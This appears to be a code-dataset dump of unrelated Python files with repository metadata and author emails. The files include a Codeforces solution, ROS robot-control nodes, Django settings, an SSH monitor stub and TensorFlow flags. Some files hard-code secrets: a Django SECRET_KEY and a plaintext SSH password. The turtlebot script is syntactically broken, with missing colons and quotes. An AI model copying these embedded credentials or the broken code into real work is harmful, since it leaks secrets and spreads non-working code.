min_indice = np.argmin(perp)
print(alpha_range[min_indice])
plt.figure()
plt.plot(alpha_range, perp)
plt.show()
| [
"joeyzhengzhe@gmail.com"
] | joeyzhengzhe@gmail.com |
2c05a5eb643ee36b8e1f9138cc739f830a29c969 | 38be6da813f2d230a90d1ac4c7deb81ca6221be0 | /search/binary_search/codeforces/F1324D/Solution.py | 55ba84a305dc917f87772d4b5b6ba75b95632875 | [
"MIT"
] | permissive | MdAman02/problem_solving | c8c0ce3cd5d6daa458cb0a54ac419c7518bdbe1f | 1cb731802a49bbb247b332f2d924d9440b9ec467 | refs/heads/dev | 2022-09-13T09:40:51.998372 | 2022-09-04T14:15:17 | 2022-09-04T14:15:17 | 256,194,798 | 0 | 0 | MIT | 2020-04-16T19:08:24 | 2020-04-16T11:27:57 | Java | UTF-8 | Python | false | false | 616 | py | # problem name: Pair of Topics
# problem link: https://codeforces.com/contest/1324/problem/D
# contest link: https://codeforces.com/contest/1324
# time: (?)
# author: reyad
# other_tags: sortings, two pointers, data structures
# note: this problem can be solved in various ways, so there are so many tags
from bisect import bisect_left

n = int(input())
a = [int(_) for _ in input().split()]
b = [int(_) for _ in input().split()]
# Count pairs (i, j) with a_i + a_j > b_i + b_j, i.e.
# (a_i - b_i) + (a_j - b_j) > 0.  u holds the differences, v = -u sorted.
u = sorted([i-j for i, j in zip(a, b)])
v = sorted([i-j for i, j in zip(b, a)])
a = 0  # reused as the pair counter
for x in u:
    # bisect_left(v, x) counts j with -(a_j - b_j) < x, i.e. x + diff_j > 0;
    # subtract 1 when x > 0 to discard the self-pairing (x with its own -x).
    a += bisect_left(v, x) - (1 if x > 0 else 0)
# Each unordered pair was counted once from each side.
print(a//2)
"reyadussalahin@gmail.com"
] | reyadussalahin@gmail.com |
387e7946b76b5cefb857f2e1d09d69c969770f03 | dee63018105424e25595f798b70b20a2085ab701 | /src/wam.py | 58239a6099b7e58b4b26598c239fc6516bdf6b29 | [] | no_license | tian-zhou/ttp | 166da7951a8e8cbf91ce60e28fd5f485347a988c | 61965f6e0d4bda347bc26314aedfcc84401d539f | refs/heads/master | 2020-03-11T09:20:42.224432 | 2018-05-27T19:04:14 | 2018-05-27T19:04:14 | 129,907,848 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,590 | py | #!/usr/bin/env python
"""
Description:
the program which governs communication with WAM robot
get real-time heartbeat from WAM to know its position
and send target joint position for WAM to go to
Sample usage:
wam = WAM()
wam.init_socket(host='128.46.125.212', port=4000, buflen=256)
wam.query_joint_position()
wam.move_joint([0, 0, 0, 0, 0, 0, 0])
wam.go_home()
Author:
Tian Zhou (leochou1991@gmail.com)
Date:
Nov 2, 2017
License:
GNU General Public License v3
"""
import sys
import rospy
from std_msgs.msg import String
from geometry_msgs.msg import Pose
from sensor_msgs.msg import JointState
import time
import socket
import numpy as np
def pprint(name, l):
l_str = ''.join(['%.3f ' % item for item in l])
print name + ': ' + l_str
class WAM:
    """ROS bridge for a WAM robot arm reached over a TCP socket.

    Polls the robot's joint and Cartesian poses and republishes them as ROS
    topics (`joint_states`, `cart_states`); relays motion commands received
    on the `wam_command` topic back over the socket.
    """

    def __init__(self):
        # init node for wam_node
        rospy.init_node('wam_node')
        # everything about publishing robot joint state
        self.joint_pub = rospy.Publisher('joint_states', JointState, queue_size=10)
        self.joint_msg = JointState()
        self.joint_msg.name = ['wam/base_yaw_joint', 'wam/shoulder_pitch_joint', \
            'wam/shoulder_yaw_joint', 'wam/elbow_pitch_joint', 'wam/wrist_yaw_joint', \
            'wam/wrist_pitch_joint', 'wam/palm_yaw_joint']
        # monotonically increasing sequence number for JointState headers
        self.joint_msg_sep = 0
        # everything about publishing robot cart state
        self.cart_pub = rospy.Publisher('cart_states', Pose, queue_size=10)
        self.cart_msg = Pose()
        # init the subscriber now; the callback only records the latest command
        rospy.Subscriber("wam_command", String, self.wam_command_msg_callback)
        self.move_wam_msg = None

    def clean_shutdown(self):
        """Send the arm home and close the socket when the node shuts down."""
        print("\nExiting moveWAM_BRIDGE()...")
        if self.socket:
            self.go_home()
            self.socket.close()
            print "Socket closed properly..."

    def init_socket(self, host, port, buflen):
        # init socket with Multimodal.exe in Windows C++
        if host == 'local_file':
            # NOTE(review): hard-coded absolute path; file handle is never closed.
            file = open("/home/tzhou/Workspace/catkin_ws/src/ttp/model/WAM_IP.txt", "r")
            host = file.read()
            print "recovered WAM IP %s from local file..." % host
        # create a socket object
        self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.buflen = buflen
        # connection to hostname on the port.
        # Retry until connected or ROS shuts down (0.1 s between attempts).
        re_try = 1
        while re_try and not rospy.is_shutdown():
            try:
                self.socket.connect((host, port))
                re_try = 0
            except:
                # NOTE(review): bare except also swallows non-socket errors.
                print("Connection failed. Retry after 0.1 seconds")
                re_try = 1
                time.sleep(0.1)
                continue
        print "Built socket connection with WAM PC..."
        print "Heartbeat started to get real-time robot joint positions..."
        print "Wait for path planning result to move the robot..."

    def query_joint_pose(self):
        # Command '2' requests the joint pose; reply is a space-separated string.
        self.socket.send('2')
        time.sleep(0.01)
        pac = self.socket.recv(self.buflen)
        return pac

    def query_cart_pose(self):
        # Command '9' requests the Cartesian pose.
        self.socket.send('9')
        time.sleep(0.01)
        pac = self.socket.recv(self.buflen)
        return pac

    def go_home(self):
        # Command '4' sends the arm to its home position.
        print "go home WAM you are drunk!!!"
        self.socket.send('4')
        time.sleep(1)

    def wam_command_msg_callback(self, msg):
        # Store the latest command; it is forwarded from run(), not from here.
        self.move_wam_msg = msg.data

    def publish_joint_pose(self, pac):
        """Parse a joint-pose packet and publish it as a JointState message."""
        # Each field is fixed-width; keep the first 8 characters of each token.
        pac = pac.split()[:7]
        robot_pos = [float(s[:8]) for s in pac]
        wam_joint = robot_pos[0:7]
        self.joint_msg.position = wam_joint
        self.joint_msg.header.seq = self.joint_msg_sep
        self.joint_msg_sep += 1
        # Split wall-clock time into whole seconds and nanoseconds.
        current_time = time.time()
        self.joint_msg.header.stamp.secs = int(current_time)
        self.joint_msg.header.stamp.nsecs = int((current_time-int(current_time))*1e9)
        self.joint_pub.publish(self.joint_msg)

    def publish_cart_pose(self, pac):
        """Parse a Cartesian-pose packet and publish it as a Pose message."""
        pac = pac.split()[:8]
        cart_pos = [float(s[:8]) for s in pac]
        # cart_pos[0] is skipped — presumably a packet tag; TODO confirm protocol.
        self.cart_msg.position.x = cart_pos[1]
        self.cart_msg.position.y = cart_pos[2]
        self.cart_msg.position.z = cart_pos[3]
        self.cart_msg.orientation.w = cart_pos[4]
        self.cart_msg.orientation.x = cart_pos[5]
        self.cart_msg.orientation.y = cart_pos[6]
        self.cart_msg.orientation.z = cart_pos[7]
        self.cart_pub.publish(self.cart_msg)

    def run(self):
        """Main loop: poll poses, republish them, forward pending commands."""
        rospy.on_shutdown(self.clean_shutdown)
        while not rospy.is_shutdown():
            pac = self.query_joint_pose()
            self.publish_joint_pose(pac)
            pac = self.query_cart_pose()
            self.publish_cart_pose(pac)
            # we have to do it here, otherwise the callback function
            # mess up with the query joint/cart poses process
            if self.move_wam_msg:
                self.socket.send(self.move_wam_msg)
                time.sleep(0.01)
                pac = self.socket.recv(self.buflen)
                assert (pac == 'complete')
                # NOTE(review): move_wam_msg is never reset to None here, so the
                # same command appears to be resent every loop iteration until a
                # new one arrives — confirm whether that is intended.
        rospy.signal_shutdown("run() finished...")
if __name__ == '__main__':
    try:
        # Connect using the WAM IP recovered from the local file, then loop.
        wam = WAM()
        wam.init_socket(host='local_file', port=4000, buflen=256)
        wam.run()
    except KeyboardInterrupt:
        print("Ok ok, keyboard interrupt, quitting")
        sys.exit(1)
    else:
        # NOTE(review): exiting with code 2 on normal termination is unusual
        # (0 conventionally means success) — confirm callers rely on this.
        print("Normal termination")
        sys.exit(2)
"leochou1991@gmail.com"
] | leochou1991@gmail.com |
a332729be8de4ce9a7e33437066ae82c80110be0 | bf7ad5c52e5be4fbf34816b95932d520e0f579d4 | /repeat.py | 0419ac8f22b5134ed7e2a5bb1e9e31d10d076841 | [] | no_license | veronicarose27/vero | 4722381a6598e3fc6f87596d52f6ca860219ad19 | c943344596dc4398accdd81bd9936ff114b8d738 | refs/heads/master | 2020-06-11T21:13:32.613495 | 2019-07-19T17:20:46 | 2019-07-19T17:20:46 | 194,087,132 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 246 | py | y,z=map(int,input().split())
p=list(map(int,input().split()))
count=0
for i in range(0,len(p)):
for j in range(1,len(p)):
if(p[i]==p[j]):
count=count+1
if(count==z):
print(p[i])
break
| [
"noreply@github.com"
] | veronicarose27.noreply@github.com |
9b62a7f48fc31dd7431f348d7aa69ae41a386d94 | 6905b39a6d982c414a641861663c7da93b25351c | /app/app/settings.py | 68ccef7037fdb818a0146ce53807c6c20b8b05ab | [
"MIT"
] | permissive | dipee/recipe-app-api | 003668f7a476485616a77c885a26c399f24f31a3 | 1215da91f1336c204fabaafdfba74a3ebe7c7f9d | refs/heads/main | 2023-03-19T18:38:03.057332 | 2021-03-14T18:13:21 | 2021-03-14T18:13:21 | 343,751,639 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,317 | py | """
Django settings for app project.
Generated by 'django-admin startproject' using Django 3.1.7.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
import os
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent

# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
# SECURITY(review): this key is committed to source control; load it from an
# environment variable before deploying.
SECRET_KEY = 'p2^@r&8ynzu8&-#m!grt*7xnl@$r+*9q(v(1-3x=4(li_c7*f3'

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True

ALLOWED_HOSTS = []

# Application definition
# Django contrib apps + DRF (with token auth) + the project's own apps.
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'rest_framework',
    'rest_framework.authtoken',
    'core',
    'user',
    'recipe',
]

MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]

ROOT_URLCONF = 'app.urls'

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]

WSGI_APPLICATION = 'app.wsgi.application'

# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
# PostgreSQL; connection details come from the environment (e.g. docker-compose).
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.postgresql',
        'HOST': os.environ.get('DB_HOST'),
        'NAME': os.environ.get('DB_NAME'),
        'USER': os.environ.get('DB_USER'),
        'PASSWORD': os.environ.get('DB_PASS'),
    }
}

# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]

# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True

# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'

# Use the project's custom user model instead of django.contrib.auth.User.
AUTH_USER_MODEL = 'core.User'
| [
"dipen.2052@gmail.com"
] | dipen.2052@gmail.com |
5cb177dcd14dbafc7f108ae4f38bcc1277cfc7ee | 0c3cb483095ab16018178cd8fec9c911e24597d5 | /main/app.py | a62ac1efe34bd5a86e91fb63e490a803945e7c2d | [] | no_license | AlexandreGuillermin/perso | d2ded3be9fb2b5f27b1fabe36a841d20796d2afb | b85a23987c36b35aa88d092f852268e5963a83ed | refs/heads/master | 2020-12-06T22:33:47.460101 | 2020-01-08T14:43:29 | 2020-01-08T14:43:29 | 232,569,844 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 252 | py | from main.repository.monitor import Monitor
def run():
server_ip_address = "3.89.135.227"
port = 22
username = "interfadm"
password = "Projet654!"
monitor = Monitor(server_ip_address, username, password)
monitor.connect_ssh()
| [
"noreply@github.com"
] | AlexandreGuillermin.noreply@github.com |
2e2ce31c358b69b0e6e61d4d8d53e58e55c87bf3 | 761975333f8353f0e23555c551b8eddc1b8bbe2b | /csvtools/csvsubsample.py | 4ec195c90c9ccca8464261aed1158fea43361307 | [
"MIT"
] | permissive | anbubenzigar/csvtools | e8763a0f9369f0101603b3988d5c2eede7c8cd7f | 6b6666369a70e367d8a9727472d2e72cfa658765 | refs/heads/master | 2023-04-10T21:21:47.302465 | 2021-04-20T23:47:29 | 2021-04-20T23:47:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,013 | py | #!/usr/bin/env python
'''
subsample a tsv
'''
import argparse
import logging
import random
import sys
def main(probability):
    """Copy stdin to stdout, always keeping the header line and keeping each
    subsequent record with probability `probability`."""
    logging.info('reading from stdin...')
    total = 0
    written = 0
    for line_number, line in enumerate(sys.stdin):
        if line_number == 0:
            # Header is always passed through and not counted.
            sys.stdout.write(line)
            continue
        total += 1
        if random.random() < probability:
            sys.stdout.write(line)
            written += 1
    logging.info('done. wrote %i of %i records', written, total)
if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Subsample tsv')
    # FIX: the --probability help text previously read 'tumour vcf' (a
    # copy-paste leftover from another tool); describe the real parameter.
    parser.add_argument('--probability', required=False, type=float, default=1.0, help='probability of keeping each record (default 1.0 keeps all)')
    parser.add_argument('--verbose', action='store_true', help='more logging')
    args = parser.parse_args()
    # Verbosity only changes the logging threshold; the format is shared.
    if args.verbose:
        logging.basicConfig(format='%(asctime)s %(levelname)s %(message)s', level=logging.DEBUG)
    else:
        logging.basicConfig(format='%(asctime)s %(levelname)s %(message)s', level=logging.INFO)
    main(args.probability)
| [
"peter@supernifty.org"
] | peter@supernifty.org |
214b345dca75eb30cf6d1b15dca4381e00f58318 | d365ef1d86978270ac1df20efdba30c0c06d0a62 | /preprocessing/generate_two_hit.py | 8d69d7fa869412978202687459325c2043cf5488 | [] | no_license | lujonathanh/mutex | ac9c24316c1ae30de3467fce5f6869e0d37aa116 | 50dd444a3c6c0797667950fa1c5038faabc7ebc5 | refs/heads/master | 2020-12-15T21:32:34.822462 | 2016-06-20T20:41:34 | 2016-06-20T20:41:34 | 41,464,148 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,236 | py | __author__ = 'jlu96'
__author__ = 'jlu96'  # NOTE(review): duplicate of the assignment on the previous line
"""Given a list of genes,
generate a list of genes and their copy-numbers."""
import sys
import csv
# read in the file
def get_parser():
    """Build the command-line parser: input and output file paths, both required."""
    import argparse
    parser = argparse.ArgumentParser(
        description='Given empirical gene mutation frequencies, generate a random mutation matrix out of the existing one.')
    parser.add_argument('-i', '--input_file', required=True)
    parser.add_argument('-o', '--output_file', required=True)
    return parser
def run(args):
    """Read one gene symbol per line from the input file and write a "two-hit"
    gene list: each gene followed by a paired '<gene>loss' entry modelling
    copy-number loss. Output is one gene per row, tab-delimited."""
    input = args.input_file
    output = args.output_file
    # De-duplicate genes via a set (note: this loses the input ordering).
    genes = set()
    with open(input, 'rU') as genefile:
        for row in genefile:
            genes.add(row.rstrip())
    print genes
    gene_list = list(genes)
    # One '<gene>loss' companion per gene.
    loss_gene_list = list([gene + 'loss' for gene in genes])
    new_gene_list = gene_list + loss_gene_list
    with open(output, 'w') as outfile:
        writer = csv.writer(outfile, delimiter='\t')
        for gene in new_gene_list:
            writer.writerow([gene])
    print "Two-hit gene list written to ", output
def main():
    # Parse CLI arguments (skipping argv[0]) and run the generator.
    run(get_parser().parse_args(sys.argv[1:]))

if __name__ == '__main__':
    main()
| [
"jhlu@princeton.edu"
] | jhlu@princeton.edu |
7cdd8e007bc22f51a231b7ec3f258d116447346c | aca4cf4bb1bdef2ab69db7b2ae1fe12c04af2bfc | /Users/delegatealloc.py | cd539a69eceafb361fae56de4730b8cec7e4ac9e | [] | no_license | PatrickMcGuinness/delegate-tools | 0154cdd3fc2eba042775c4117a5b3421396d2a7e | b8654ff324dff2aa2e24aaaedc2a365727930632 | refs/heads/master | 2021-07-03T01:13:20.162801 | 2016-03-22T21:56:52 | 2016-03-22T21:56:52 | 48,651,387 | 0 | 0 | null | 2021-06-10T18:05:36 | 2015-12-27T16:09:31 | Python | UTF-8 | Python | false | false | 5,757 | py | #!/usr/bin/python
import sys
import curses
from operator import itemgetter
from delegaterules import *
#from readpolldata import *
# Maps two-letter state/territory postal codes to the spelled-out names used
# elsewhere in the polling data (note: 'PuertoRico' intentionally has no space).
statemap = { 'AL': 'Alabama', 'AK': 'Alaska', 'AR': 'Arkansas', 'GA': 'Georgia',
             'HI': 'Hawaii', 'ID': 'Idaho', 'KS': 'Kansas',
             'KY': 'Kentucky', 'LA': 'Louisiana', 'ME': 'Maine', 'MA': 'Massachusetts',
             'MI': 'Michigan', 'OK': 'Oklahoma', 'PR': 'PuertoRico',
             'TN': 'Tennessee', 'TX': 'Texas', 'VT': 'Vermont', 'VA': 'Virginia',
             'MN': 'Minnesota', 'WY':'Wyoming', 'MS': 'Mississippi', 'MO':'Missouri',
             'AZ': 'Arizona', 'UT':'Utah'}
class Delegates():
    def __init__(self):
        # No per-instance state; the allocation methods below are stateless.
        return
    # WTA rule: If a cand > WTA gets all delegates
    # propthresh rule: If a candidate > propthresh, then proportionally to all candidates > thresh, shared by at least minthreshsplit
    # minthreshsplit can be 1 (if only one candidate is above the threshold, they get all delegates), or 2 (texas rules)
    # Fail to meet propthresh: If all candidates are < propthresh, then proportionally for all candidates
    # We take out boundtotopvote dels from the at-large pool and assign it to
    # top vote getter. (GA rules)
    # CD rules: 3 dels - if top > WTA, 3 to top, if top > propthresh, 2 to top, 1 to next
    # else 1 to the top 3 each
    def delegate_alloc(self, rules, pollorder):
        """Allocate rules['numdelegates'] delegates for one contest.

        `pollorder` is a list of (candidate, poll_share) tuples sorted in
        descending poll order; returns a dict candidate -> delegates won.
        NOTE(review): this module targets Python 2 (print statements appear
        elsewhere in the file), so `/` below is integer division for the
        int operands (e.g. `total_dels / 3`).
        """
        # print "in delegate_alloc"
        propthresh = rules['propthresh']
        total_dels = rules['numdelegates']
        min_thresh_split = rules['minthreshsplit']
        DelList = {}
        # print pollorder, dels
        # Unzip (candidate, poll) tuples into parallel lists.
        cand = [0] * len(pollorder)
        poll = [0] * len(pollorder)
        for i in range(len(pollorder)):
            (cand[i], poll[i]) = pollorder[i]
        num_above_thresh = sum(x[1] > propthresh for x in pollorder)
        if num_above_thresh > 0:
            alloc_split = max(min_thresh_split, num_above_thresh)
        else:
            # Nobody met the threshold: share proportionally among everyone.
            alloc_split = len(pollorder)
        # polling_sum = sum(x for x in poll)
        # print "num candidates:", len(pollorder), "num above threshold:",
        # num_above_thresh, "sum of polling:", polling_sum
        if poll[0] > rules['wta']:
            # Winner-take-all: the leader clears the WTA bar and gets everything.
            DelList[cand[0]] = total_dels
            return DelList
        if total_dels == 3: # CD rules - hard-coded to a 2-1 split
            if num_above_thresh > 0:
                DelList[cand[0]] = 2 * total_dels / 3
                DelList[cand[1]] = total_dels / 3
                return DelList
            else:
                # Nobody above the threshold: one delegate each to the top three.
                DelList[cand[0]] = total_dels / 3
                DelList[cand[1]] = total_dels / 3
                DelList[cand[2]] = total_dels / 3
                return DelList
        else: # At-large rules
            #topbonus is Georgia rule, giving top vote getter 3 at-large dels
            topbonus = 0
            if 'topvotedelbonus' in rules:
                topbonus = rules['topvotedelbonus']
            total_dels = total_dels - topbonus
            pollsum = sum(x[1] for x in pollorder[0:alloc_split])
            sumdels = 0
            # proportional among the candidates who qualify. We use rounding and then
            # addition of delegates if needed. There are variations in rounding (we ignore).
            for i in range(alloc_split):
                DelList[cand[i]] = round((poll[i] / pollsum) * total_dels)
                sumdels += round((poll[i] / pollsum) * total_dels)
                #print i, cand[i], poll[i], DelList[cand[i]],sumdels, pollsum,
                # print round((poll[i] / pollsum) * total_dels), topbonus
            # Hand out any delegates lost to rounding, one per top candidate.
            remainingdels = int(total_dels - sumdels)
            DelList[cand[0]] += topbonus
            for i in range(remainingdels):
                DelList[cand[i]] += 1
            return DelList
#CandPoll is a state poll
def alloc_delegates(self, state_code, state_rule, statewide_poll, cd_rule, state_polls):
delslist = {}
pollorder = sorted(statewide_poll.items(), key=itemgetter(1), reverse=True)
if state_rule['allocbycd'] == True:
num_cds = cd_rule['numdistricts']
dels_per_cd = cd_rule['numdelegates']
cd_dels = dels_per_cd * num_cds
else:
cd_dels = num_cds = dels_per_cd = 0
print "\nState of", state_rule['state'], "delegates:", cd_dels , "delegates in CDs and", state_rule['numdelegates'], "at-large delegates,",
print cd_dels + state_rule['numdelegates'], "total delegates."
# state delegate allocations
print pollorder
delswon = self.delegate_alloc(state_rule, pollorder)
delslist[state_code]=delswon
# Do we allocate by CDs?
if state_rule['allocbycd']==True:
print "Alloc by CD for ", num_cds, "districts"
for i in range(1,num_cds+1):
loc = state_code + "CD" + str(i)
if loc in state_polls:
print loc, 'found in state poll'
cdpollorder = sorted(state_polls[loc].items(), key=itemgetter(1), reverse=True)
else: # use statewide poll if there is no CD poll
print "no CD poll found for", loc, "in", state_polls
cdpollorder = pollorder
print cdpollorder
delswon = self.delegate_alloc(cd_rule, cdpollorder)
delslist[loc]=delswon
else:
print "No allocation by CD for", state_rule['state']
print delslist
Sum = {i:0 for i in statewide_poll}
for result in delslist:
#print result
for cand in delslist[result]:
Sum[cand] += delslist[result][cand]
print state_rule['state'], "delegates awarded:", Sum
return delslist
| [
"patmcguinness.phd@gmail.com"
] | patmcguinness.phd@gmail.com |
88d05efddc975407fb314b5486c42ded026b9c49 | 16c4ab33348361916ac99566a3de8a9c08c8ffc5 | /extra_apps/__init__.py | b8c8a59f4167fd637e987389ed883bc06fd623c7 | [
"Apache-2.0"
] | permissive | Palameng/ProjectSupportingSystem | bf4dc3d7212507b1abbed5d50c86150d465742ef | 8f9be803b1d2bbac0e32adf1b5ad4808e26503ae | refs/heads/master | 2021-09-05T15:48:34.667035 | 2018-01-29T12:12:54 | 2018-01-29T12:12:54 | 103,030,597 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 76 | py | # -*- coding: utf-8 -*-
__author__ = 'mengyuan'
__date__ = '2017/9/11 12:05' | [
"506357902@qq.com"
] | 506357902@qq.com |
549ad5623bc23154c244901bbf465508ae483cf7 | fdc751232f7e1bdf7d0afc12f9b11e8b5f7fd3ae | /move/src/test_ctrl_class.py | a4aeccfb00203d34dc9e49554206588a07c92009 | [] | no_license | tianyaoh/patrolling_basic | 615d48ecdeda89465e41c63c3ee7476b3083fa09 | ebdd7be15773da6c896a9fd904f80933b83b4114 | refs/heads/main | 2023-04-19T12:44:58.003513 | 2021-05-10T16:03:12 | 2021-05-10T16:03:12 | 340,202,479 | 0 | 0 | null | 2021-05-10T16:04:06 | 2021-02-18T23:14:28 | Python | UTF-8 | Python | false | false | 4,301 | py | #!usrbinenv python
import rospy
from geometry_msgs.msg import Twist
import time
# rospy.init_node('move_forward_publisher')
# frw_pub = rospy.Publisher('cmd_vel', Twist, queue_size=1)
# starting_time = rospy.Time.now()
# while not rospy.is_shutdown()
# twist = Twist()
# twist.linear.x = 0.2
# frw_pub.publish(twist)
class BotControl()
def __init__(self,robot_name = turtlebot)
# initializing python as node
rospy.init_node('control_node')
# print to console
rospy.loginfo(This is turtlebot at your command)
# topic,msg_type,publisher, &subscriber
self.cmd_vel_topic = cmd_vel
self.cmd = Twist()
self.front_scan_topic = 'frontscan'
self.back_scan_topic = 'backscan'
self.right_scan_topic = 'rightscan'
self.left_scan_topic = 'leftscan'
# start publisher
self.cmd_publisher = rospy.Publisher('cmd_vel', Twist, queue_size=1)
# coordinate disposition
self.disposition = {disp_lx0,disp_ly0,disp_lz0,disp_ax0,disp_ay0,disp_az0}
# This is the state of motion, boolean
# now in_motion, not_in_motion
# future moving,airborne,sliping,sinking,rolling
self.moving = False
# self_stop
self.rate = rospy.Rate(1)
def move_straight_for_x(self,speed,direction,time)
# ensuring positvity for speed
speed = abs(speed)
# rospy.loginfo(initial speed %s,speed)
if direction == 'backward'
speed = -speed
i = 0
self.moving = True
# loop to publish the velocity estimate, current_distance = velocity (t1 - t0)
while (i = time)
# Publish the velocity
self.motion(lx = speed)
i += 1
self.rate.sleep()
self.stop()
def move_straight(self,speed,direction='forward')
# ensuring positvity for speed
speed = abs(speed)
# rospy.loginfo(initial speed %s,speed)
if direction == 'backward'
speed = -speed
# publishing velocity
self.motion(lx = speed)
self.moving = True
def turn_time(self,direction,speed,time)
speed = abs(speed)
if direction == 'counter_clockwise'
speed = -speed
i = 0
self.moving = True
# loop to publish the velocity estimate, current_distance = velocity (t1 - t0)
while (i = time)
# Publish the velocity
self.motion(az = speed)
i += 1
self.rate.sleep()
self.stop()
def turn(self,direction,speed)
speed = abs(speed)
if direction == 'counter_clockwise'
speed = -speed
self.motion(az = speed)
def publish_once_in_cmd_vel(self)
# This function is taken from the Python-Robotic class from Construct.com
# From the 4th chapter about function, under the class bot_control, function publish_once in cmd_vel
# There is little change for variable names but structure is kept as original.
while not rospy.is_shutdown()
connections = self.cmd_publisher.get_num_connections()
if connections 0
self.cmd_publisher.publish(self.cmd)
#rospy.loginfo(Cmd Published)
break
else
self.rate.sleep()
# privat function should only be used internally
def motion(self,lx = 0,ly =0,lz = 0,ax = 0,ay = 0,az = 0)
# updateing cmd
self.cmd.linear.x = lx
self.cmd.linear.y = ly
self.cmd.linear.z = lz
self.cmd.angular.x = ax
self.cmd.angular.y = ay
self.cmd.angular.z = az
# rospy.loginfo(lx = %s ly = %s lz = %s ax = %s ay = %s az = %s ,lx,ly,lz,ax,ay,az)
# publishing in ignorance of connection
self.publish_once_in_cmd_vel()
self.moving = True
def move_towards_x_y(x,y)
pass
# write action client
# def distance_in_theory(x_axis,speed,t1,t2)
# temp = speedabs(abs(t1)-abs(t2))
# self.disposition[x_axis] += temp
# return temp
def stop(self)
self.motion()
self.moving = False
# rospy.loginfo(Bot internally not in motion)
| [
"65034293+tianyaoh@users.noreply.github.com"
] | 65034293+tianyaoh@users.noreply.github.com |
6110d7d86503b01878af17b0f37d98e5097fece2 | f4b7d327581e500dc79079c834cc23af9939737e | /moonlight/models/base/glyph_patches.py | 263b33c17cd0a8a9c7f22e54295ce5b1953d0b75 | [
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
] | permissive | abc3436645/moonlight | 095eea2b892528b9a3fe5d05af39e4a023c55628 | 7f8a3ab4e55570dd120e3965f8049dd866d12a6b | refs/heads/master | 2020-03-25T19:37:01.849371 | 2018-08-07T17:42:56 | 2018-08-07T17:42:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,031 | py | # Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Base patch-based glyph model.
For example, this accepts the staff patch k-means centroids emitted by
staffline_patches_kmeans_pipeline and labeled by kmeans_labeler.
This defines the input and signature of the model, and allows any type of
multi-class classifier using the normalized patches as input.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
from absl import flags
from moonlight.models.base import batches
from moonlight.models.base import label_weights
from moonlight.util import memoize
import tensorflow as tf
from tensorflow.python.lib.io import file_io
from tensorflow.python.lib.io import tf_record
WEIGHT_COLUMN_NAME = 'weight'
FLAGS = flags.FLAGS
flags.DEFINE_string(
'train_input_patches', None, 'Glob of labeled patch TFRecords for training')
flags.DEFINE_string(
'eval_input_patches', None, 'Glob of labeled patch TFRecords for eval')
flags.DEFINE_string('model_dir', None, 'Output trained model directory')
flags.DEFINE_boolean(
'use_included_label_weight', False,
'Whether to multiply a "label_weight" feature included in the example by'
' the weight determined by the "label" value.')
flags.DEFINE_float(
'augmentation_x_shift_probability', 0.5,
'Probability of shifting the patch left or right by one pixel. The edge is'
' filled using the adjacent column. It is equally likely that the patch is'
' shifted left or right.')
flags.DEFINE_float(
'augmentation_max_rotation_degrees', 2.,
'Max rotation of the patch, in degrees. The rotation is selected uniformly'
' randomly from the range +- this value. A value of 0 implies no rotation.')
flags.DEFINE_integer(
'eval_throttle_secs', 60, 'Evaluate at at most this interval, in seconds.')
flags.DEFINE_integer(
'train_max_steps', 100000,
'Max steps for training. If 0, will train until the process is'
' interrupted.')
flags.DEFINE_integer('eval_steps', 500, 'Num steps to evaluate the model.')
